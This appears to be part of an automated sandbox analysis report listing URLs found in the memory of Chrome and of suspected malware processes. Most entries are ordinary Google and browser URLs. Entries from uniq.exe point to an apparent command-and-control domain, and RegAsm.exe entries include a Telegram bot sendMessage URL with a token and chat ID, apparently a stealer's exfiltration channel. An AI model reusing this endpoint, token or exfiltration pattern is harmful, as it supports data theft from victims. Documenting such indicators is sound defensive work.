Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2689974331.00004A2C003A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162
Source: chrome.exe, 00000013.00000002.2689974331.00004A2C003A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8162%
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692228311.00004A2C005C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8215
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2688417191.00004A2C0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2707721346.00004A2C00ABC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229
Source: chrome.exe, 00000013.00000002.2707721346.00004A2C00ABC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8229(
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anglebug.com/8280
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clients2.google.com/time/1/current
Source: chrome.exe, 00000013.00000002.2692835975.00004A2C00630000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://clientservices.googleapis.com/chrome-variations/seed?osname=win&channel=stable&milestone=117
Source: chrome.exe, 00000013.00000002.2688779849.00004A2C000EC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692628213.00004A2C0060C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://developer.chrome.com/extensions/external_extensions.html)
Source: chrome.exe, 00000013.00000002.2688558017.00004A2C0008F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://google.com/
Source: chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://issuetracker.google.com/200067929
Source: chrome.exe, 00000013.00000003.2598848938.00004A2C01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598651063.00004A2C0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598781122.00004A2C00E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598710399.00004A2C0102C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://jsbin.com/temexa/4.
Source: chrome.exe, 00000013.00000003.2598741210.00004A2C0107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598848938.00004A2C01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690294971.00004A2C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599825456.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598651063.00004A2C0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2689902712.00004A2C00377000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600144793.00004A2C00930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599737318.00004A2C0042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600578069.00004A2C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599767291.00004A2C009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598781122.00004A2C00E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599877157.00004A2C00E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598710399.00004A2C0102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600295823.00004A2C01118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/AUTHORS.txt
Source: chrome.exe, 00000013.00000003.2598741210.00004A2C0107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598848938.00004A2C01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690294971.00004A2C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599825456.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598651063.00004A2C0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2689902712.00004A2C00377000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600144793.00004A2C00930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599737318.00004A2C0042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600578069.00004A2C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599767291.00004A2C009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598781122.00004A2C00E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599877157.00004A2C00E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598710399.00004A2C0102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600295823.00004A2C01118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/CONTRIBUTORS.txt
Source: chrome.exe, 00000013.00000003.2598741210.00004A2C0107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598848938.00004A2C01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690294971.00004A2C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599825456.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598651063.00004A2C0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2689902712.00004A2C00377000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600144793.00004A2C00930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599737318.00004A2C0042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600578069.00004A2C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599767291.00004A2C009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598781122.00004A2C00E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599877157.00004A2C00E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598710399.00004A2C0102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600295823.00004A2C01118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/LICENSE.txt
Source: chrome.exe, 00000013.00000003.2598741210.00004A2C0107C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598848938.00004A2C01048000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690294971.00004A2C0045C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599825456.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598651063.00004A2C0101C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2689902712.00004A2C00377000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600144793.00004A2C00930000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599737318.00004A2C0042C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600578069.00004A2C0120C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599767291.00004A2C009F0000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598781122.00004A2C00E0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2599877157.00004A2C00E34000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2598710399.00004A2C0102C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600295823.00004A2C01118000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://polymer.github.io/PATENTS.txt
Source: chrome.exe, 00000013.00000002.2727335721.00004A2C00ED0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://redirector.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvNzI0QUFXNV9zT2RvdUw
Source: chrome.exe, 00000013.00000002.2707148268.00004A2C009C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certs
Source: chrome.exe, 00000013.00000002.2707148268.00004A2C009C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://safebrowsing.googleusercontent.com/safebrowsing/clientreport/chrome-certsJ
Source: RegAsm.exe, 0000001B.00000002.3430741230.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: chrome.exe, 00000013.00000002.2707148268.00004A2C009C0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://unisolated.invalid/
Source: chrome.exe, 00000013.00000002.2707329197.00004A2C00A18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.gstatic.com/generate_204
Source: chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/
Source: chrome.exe, 00000013.00000002.2688558017.00004A2C00078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accountcapabilities-pa.googleapis.com/v1/accountcapabilities:batchGet
Source: chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2689974331.00004A2C003A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com
Source: chrome.exe, 00000013.00000002.2688417191.00004A2C0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/AddSession
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/GetCheckConnectionInfo
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/ListAccounts?json=standard
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/Logout
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/MergeSession
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/OAuthLogin
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/RotateBoundCookies
Source: chrome.exe, 00000013.00000003.2612479207.00004A2C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport
Source: chrome.exe, 00000013.00000003.2612479207.00004A2C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/allowlist
Source: chrome.exe, 00000013.00000003.2612479207.00004A2C00294000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/_/IdentityListAccountsHttp/cspreport/fine-allowlist
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.html
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/chrome/blank.htmlB
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/reauth/chromeos
Source: chrome.exe, 00000013.00000002.2688710098.00004A2C000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/chrome/usermenu
Source: chrome.exe, 00000013.00000002.2688710098.00004A2C000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignin/chromeos
Source: chrome.exe, 00000013.00000002.2688710098.00004A2C000B4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/kidsignup/chromeos
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/v2/chromeos
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/setup/windows
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/embedded/xreauth/chrome
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop
Source: chrome.exe, 00000013.00000002.2688558017.00004A2C00078000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/encryption/unlock/desktop?kdi=CAIaDgoKY2hyb21lc3luYxAB
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/o/oauth2/revoke
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/oauth/multilogin
Source: chrome.exe, 00000013.00000002.2689316732.00004A2C0020C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com/signin/chrome/sync?ssp=1
Source: chrome.exe, 00000013.00000002.2689218126.00004A2C001C4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.com:443
Source: chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://accounts.google.comJ
Source: uniq.exe, 00000017.00000002.2779371728.000000000156C000.00000004.00000020.00020000.00000000.sdmp, uniq.exe, 00000017.00000002.2777710828.000000000154D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://actiothreaz.com/
Source: uniq.exe, 00000017.00000002.2779189555.000000000155A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://actiothreaz.com/api
Source: uniq.exe, 00000017.00000002.2779189555.000000000155A000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://actiothreaz.com/apiX
Source: uniq.exe, 00000017.00000002.2777710828.00000000014D2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://actiothreaz.com:443/apical
Source: chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aida.googleapis.com/v1/aida:doConversation2
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692228311.00004A2C005C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830
Source: chrome.exe, 00000013.00000002.2692228311.00004A2C005C8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4830xiY
Source: chrome.exe, 00000013.00000002.2695368098.00004A2C006FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/4966
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2688417191.00004A2C0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/5845
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690373508.00004A2C00464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/6574
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692835975.00004A2C00630000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7161
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7162
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7246
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7308
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7319
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2688417191.00004A2C0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7320
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692228311.00004A2C005C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690373508.00004A2C00464000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7369
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692228311.00004A2C005C8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7382
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7489
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7604
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2688417191.00004A2C0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7714
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847
Source: chrome.exe, 00000013.00000002.2713675398.00004A2C00C0C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7847J
Source: chrome.exe, 00000013.00000003.2593200893.00004A2C00E5C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2688417191.00004A2C0001C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593124239.00004A2C00380000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://anglebug.com/7899
Source: RegAsm.exe, 0000001B.00000002.3430741230.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: MvowLGc.exe, 0000001A.00000002.2673955387.0000000003061000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.3393623748.0000000000382000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000001B.00000002.3430741230.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: RegAsm.exe, 0000001B.00000002.3430741230.00000000025F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7567333742:AAHDfYPeN-w99Wqz2UqIryCqnJvB1iXUejw/sendMessage?chat_id=46974
Source: chrome.exe, 00000013.00000003.2614989401.00004A2C013A8000.00000004.00000800.00020000.00000000.sdmp, chromecache_144.21.dr, chromecache_139.21.dr	String found in binary or memory: https://apis.google.com
Source: chrome.exe, 00000013.00000002.2709776222.00004A2C00B18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com/_/scs/abc-static/_/js/k=gapi.gapi.en.l2ZUC8FxqV8.O/m=gapi_iframes
Source: chrome.exe, 00000013.00000003.2651755090.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2616371451.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2690411249.00004A2C0047C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600077601.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2722268123.00004A2C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2692708952.00004A2C00618000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://calendar.google.com/calendar/u/0/r/eventedit?usp=chrome_actions
Source: chrome.exe, 00000013.00000002.2710437355.00004A2C00B64000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.ico
Source: chrome.exe, 00000013.00000002.2713330303.00004A2C00BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.ico
Source: chrome.exe, 00000013.00000002.2713330303.00004A2C00BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icofrom_play_api
Source: chrome.exe, 00000013.00000002.2708690560.00004A2C00AE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search
Source: chrome.exe, 00000013.00000002.2708690560.00004A2C00AE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=
Source: chrome.exe, 00000013.00000002.2708690560.00004A2C00AE0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/search?ei=&fr=crmas&p=searchTerms
Source: chrome.exe, 00000013.00000002.2692835975.00004A2C00630000.00000004.00000800.00020000.00000000.sdmp, wbaa16.8.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: chrome.exe, 00000013.00000003.2591960530.00004A2C0032C000.00000004.00000800.00020000.00000000.sdmp, msedge.exe, 00000020.00000002.2778573195.00004B080001F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore
Source: chrome.exe, 00000013.00000002.2692366721.00004A2C005E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore206E5
Source: chrome.exe, 00000013.00000002.2730855726.00004A2C0110C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2707329197.00004A2C00A18000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000002.2713330303.00004A2C00BAC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: chrome.exe, 00000013.00000003.2598264107.00004A2C00D4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2593030276.00004A2C00D4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2600077601.00004A2C00C6C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2609027070.00004A2C00C7C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2649087069.00004A2C00C38000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2601008245.00004A2C00D4C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2591445934.00004A2C00C70000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2591960530.00004A2C0032C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstoreLDDiscover
Source: chrome.exe, 00000013.00000002.2686781766.00000BEC0078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/
Source: chrome.exe, 00000013.00000003.2579528949.00000BEC00390000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2618200891.00000BEC0080C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000013.00000003.2616739060.00004A2C014AC000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymity-pa.googleapis.com/2%
Source: chrome.exe, 00000013.00000002.2686781766.00000BEC0078C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chromekanonymityauth-pa.googleapis.com/
